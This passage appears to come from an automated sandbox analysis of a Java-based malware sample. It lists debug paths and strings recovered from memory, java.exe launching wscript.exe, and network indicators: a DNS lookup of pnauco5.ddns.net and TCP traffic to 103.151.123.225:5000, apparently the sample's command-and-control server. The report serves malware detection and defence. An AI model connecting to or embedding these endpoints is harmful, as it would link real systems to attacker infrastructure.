        Source: Binary string: api-ms-win-crt-private-l1-1-0.pdb source: xcopy.exe, 00000015.00000003.1698710106.00000000004DC000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\jabswitch\jabswitch.pdb source: xcopy.exe, 00000015.00000003.1703719180.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\Windows10\Desktop\CryptUtil_DLL_Visual Studio 10\x64\Release\CryptUtil.pdb source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.0000000005000000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.000000000502A000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libkrb5\w2k_lsa_auth.pdb source: xcopy.exe, 00000015.00000003.1733614981.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\hotspot\windows_i486_compiler1\product\jvm.pdb source: xcopy.exe, 00000015.00000003.1738221314.000000000277F000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: d:\a01\_work\38\s\\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: xcopy.exe, 00000015.00000003.1741105307.00000000004E0000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libjawtaccessbridge-32\JAWTAccessBridge-32.pdb source: xcopy.exe, 00000015.00000003.1705281833.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\jabswitch\jabswitch.pdb,,+ source: xcopy.exe, 00000015.00000003.1703719180.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: xcopy.exe, 00000015.00000003.1700108241.00000000004DD000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libj2gss\j2gss.pdb source: xcopy.exe, 00000015.00000003.1703452847.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libjawt\jawt.pdb source: xcopy.exe, 00000015.00000003.1705197619.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libsspi_bridge\sspi_bridge.pdb source: xcopy.exe, 00000015.00000003.1730677156.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\java-rmi_objs\java-rmi.pdb source: xcopy.exe, 00000015.00000003.1703805489.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\liblcms\lcms.pdb source: xcopy.exe, 00000015.00000003.1727080708.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: xcopy.exe, 00000015.00000003.1698710106.00000000004DC000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libj2pkcs11\j2pkcs11.pdb## source: xcopy.exe, 00000015.00000003.1703628681.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\liblcms\lcms.pdb11 source: xcopy.exe, 00000015.00000003.1727080708.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libjsoundds\jsoundds.pdb source: xcopy.exe, 00000015.00000003.1725756466.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libdt_socket\dt_socket.pdb source: xcopy.exe, 00000015.00000003.1701984344.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libmanagement\management.pdb&& source: xcopy.exe, 00000015.00000003.1727080708.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\orbd_objs\orbd.pdb source: xcopy.exe, 00000015.00000003.1728482839.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libjsound\jsound.pdb## source: xcopy.exe, 00000015.00000003.1725508853.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libnpt\npt.pdb source: xcopy.exe, 00000015.00000003.1728367082.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\pack200_objs\pack200.pdb source: xcopy.exe, 00000015.00000003.1728816995.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\deploy\tmp\npjp2\obj\npjp2.pdbEE, source: xcopy.exe, 00000015.00000003.1740826743.00000000004E0000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: xcopy.exe, 00000015.00000003.1700293859.00000000004DD000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\Win10\Desktop\RetriveTitle_vb2010\Release\TitleWindow.pdb source: javaw.exe, 00000006.00000002.2857437082.0000000073A98000.00000002.00000001.01000000.0000000A.sdmp, javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2849135334.000000000A707000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\Windows10\Desktop\CryptUtil_DLL_Visual Studio 10\Release\CryptUtil.pdbP8PP@Y source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.0000000005052000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.000000000502A000.00000004.00000800.00020000.00000000.sdmp

        Software Vulnerabilities

        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Process created: C:\Windows\SysWOW64\wscript.exe

        Networking

        Source: unknown DNS query: name: pnauco5.ddns.net
        Source: global traffic TCP traffic: 192.168.2.4:49739 -> 103.151.123.225:5000
        Source: Joe Sandbox View ASN Name: VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN
        Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknown DNS traffic detected: queries for: pnauco5.ddns.net
        Source: java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/validation/schema/ignore-xsi-type-until-elemdeclA
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/validation/schema/normalized-value
        Source: java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/validation/schema/normalized-valueB
        Source: javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/validation/schema/normalized-valuenternalB
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/validation/unparsed-entity-checking
        Source: javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/validation/unparsed-entity-checkingn/org/B
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/validation/warn-on-duplicate-attdef
        Source: javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/validation/warn-on-duplicate-attdef/xni/XD
        Source: java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/validation/warn-on-duplicate-attdefD
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/validation/warn-on-undeclared-elemdef
        Source: java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/validation/warn-on-undeclared-elemdef:
        Source: javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/validation/warn-on-undeclared-elemdefm/su:
        Source: java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/warn-on-duplicate-entitydef
        Source: javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/warn-on-duplicate-entitydef/xerce
        Source: javaw.exe, javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000003.1723780631.0000000015BBC000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852025567.0000000015BC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/xinclude
        Source: javaw.exe, javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/xinclude/fixup-base-uris
        Source: javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/xinclude/fixup-base-uris6
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/xinclude/fixup-language
        Source: java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/xinclude/fixup-language;
        Source: javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/xinclude/fixup-languager
        Source: javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/xinclude1
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/properties/
        Source: java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/properties/D
        Source: javaw.exe, javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/properties/dom/current-element-node
        Source: javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/properties/dom/current-element-node9
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/properties/dom/document-class-name
        Source: javaw.exe, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/properties/dom/document-class-name$
        Source: javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/properties/input-buffer-size
        Source: java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/properties/input-buffer-sizejava/l
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/datatype-validator-factory
        Source: java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/datatype-validator-factory:
        Source: javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/datatype-validator-factoryes/i:
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/document-scanner
        Source: java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/document-scannerP
        Source: javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/document-scannerypeDef7
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/dtd-processor
        Source: javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/dtd-processort5
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/dtd-scanner
        Source: javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/dtd-scannerdAt8
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/entity-manager
        Source: javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/entity-manager8
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/entity-resolver
        Source: javaw.exe, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/entity-resolver6
        Source: javaw.exe, javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/error-handler
        Source: javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/error-handler6
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/error-reporter
        Source: javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/error-reporter:
        Source: javaw.exe, javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/grammar-pool
        Source: javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/grammar-pool6
        Source: java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/namespace-binder
        Source: javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/namespace-bindery
